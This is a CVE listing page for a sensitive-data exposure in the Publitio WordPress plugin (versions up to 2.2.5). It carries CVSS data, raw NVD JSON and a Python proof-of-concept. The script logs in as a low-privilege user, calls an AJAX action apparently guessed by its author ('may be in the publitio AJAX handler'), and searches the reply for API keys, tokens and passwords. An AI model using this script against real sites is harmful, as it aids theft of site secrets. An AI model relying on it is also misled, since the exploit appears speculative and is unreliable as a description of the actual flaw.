Security Vulnerability Report
中文
CVE-2025-62947 CVSS 5.0 MEDIUM

CVE-2025-62947

Published: 2025-10-27 02:15:55
Last Modified: 2026-04-27 17:16:37

Description

Insertion of Sensitive Information Into Sent Data vulnerability in publitio Publitio publitio allows Retrieve Embedded Sensitive Data.This issue affects Publitio: from n/a through <= 2.2.5.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

publitio WordPress Plugin <= 2.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62947 PoC - Publitio Sensitive Data Exposure # Target: WordPress site with publitio plugin <= 2.2.5 TARGET = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "attacker_password" def exploit(): """ This PoC demonstrates the sensitive data exposure vulnerability in publitio plugin. The vulnerability allows low-privileged users to retrieve embedded sensitive data. """ # Step 1: Authenticate with low-privilege account session = requests.Session() auth_url = f"{TARGET}/wp-login.php" auth_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } try: response = session.post(auth_url, data=auth_data, timeout=10) if 'wordpress_logged_in' not in session.cookies: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Exploit the sensitive data exposure # The vulnerable endpoint may be in the publitio AJAX handler exploit_url = f"{TARGET}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'publitio_get_sensitive_data', 'nonce': 'attacker_provided_or_missing_nonce' } response = session.post(exploit_url, data=exploit_data, timeout=10) if response.status_code == 200: print(f"[+] Response received: {response.text[:500]}") # Check if sensitive data is exposed if any(keyword in response.text.lower() for keyword in ['api_key', 'secret', 'token', 'password', 'key']): print("[!] Sensitive data exposure confirmed!") return True print("[-] Exploitation may have failed - check manually") return False except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-62947 PoC - Publitio Plugin Sensitive Data Exposure") exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62947", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:55.013", "lastModified": "2026-04-27T17:16:37.230", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in publitio Publitio publitio allows Retrieve Embedded Sensitive Data.This issue affects Publitio: from n/a through <= 2.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/publitio/vulnerability/wordpress-publitio-plugin-2-2-3-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}